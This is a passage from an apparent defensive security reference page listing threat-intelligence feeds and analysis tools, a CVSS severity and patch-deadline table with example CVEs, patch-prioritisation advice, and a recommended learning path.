`CyberChef`	Data Analysis	Encode/decode, analyze, transform data — "the analyst's Swiss Army knife"
`MISP`	Threat Intel	Share and consume threat intelligence (IOCs, TTPs)
`TheHive`	IR Platform	Collaborative incident response case management

Live CVE & Threat Intelligence

// REAL-TIME VULNERABILITY & ATTACK FEEDS

Staying current on vulnerabilities and threat intelligence is a daily discipline. Attackers exploit new CVEs within hours of publication. Subscribe to these feeds and configure automated alerts for your asset types.

Vulnerability Database

NIST NVD

nvd.nist.gov — Official CVE database with CVSS scores

Actively Exploited

CISA KEV Catalog

cisa.gov — Must-patch list of exploited-in-wild vulns

Exploitation Probability

EPSS Score

first.org/epss — Probability score of exploitation in 30 days

Adversary TTPs

MITRE ATT&CK

attack.mitre.org — Full adversary knowledge base

Internet Scanner

Shodan

shodan.io — Find your exposed services before attackers

Open Threat Intelligence

AlienVault OTX

otx.alienvault.com — IOCs, malware analysis, threat pulses

Internet Noise Analysis

GreyNoise

viz.greynoise.io — Distinguish targeted vs. mass-scan traffic

Credential Breach Check

Have I Been Pwned

haveibeenpwned.com — Check if your creds are in breach dumps

Malware Analysis

VirusTotal

virustotal.com — Scan files, URLs, hashes across 70+ AV engines

Malware Repository

MalwareBazaar

bazaar.abuse.ch — Open malware sample and IOC sharing

CVE Severity Reference

Severity	CVSS Range	Patch SLA	Example
CRITICAL	9.0 – 10.0	24 hours — isolate if can't patch	CVE-2024-3094 (XZ, 10.0), Log4Shell (10.0)
HIGH	7.0 – 8.9	7 days	CVE-2023-44487 (HTTP/2 Rapid Reset, 7.5)
MEDIUM	4.0 – 6.9	30 days	Typical XSS, auth bypass in internal tools
LOW	0.1 – 3.9	90 days	Information disclosure, hardening recommendations

⚠

CVSS ≠ Priority. A CVSS 9.8 on an internal system no attacker can reach may matter less than a CVSS 6.5 on your public-facing login API. Combine CVSS with EPSS (probability of exploitation) and CISA KEV (confirmed exploited in wild) for true risk prioritization. EPSS 0.85 + CISA KEV = patch today, regardless of CVSS.

Learning Resources

// YOUR SECURITY EDUCATION ROADMAP

Security is a field where continuous learning is not optional — it is the job. Attackers innovate constantly. Here are the highest-quality resources to build and maintain expertise, from absolute beginner to threat intelligence analyst.

▸

Recommended Learning Path: (1) Start with PortSwigger Web Security Academy — free, comprehensive, practical. (2) Practice on TryHackMe beginner paths. (3) Read Verizon DBIR annually — it tells you what's actually happening in the real world. (4) Follow @SwiftOnSecurity, @hacks4pancakes, and @thegrugq on social media for daily threat intelligence. (5) When ready, pursue OSCP (offensive) or GCIA/GCIH (defensive) certifications.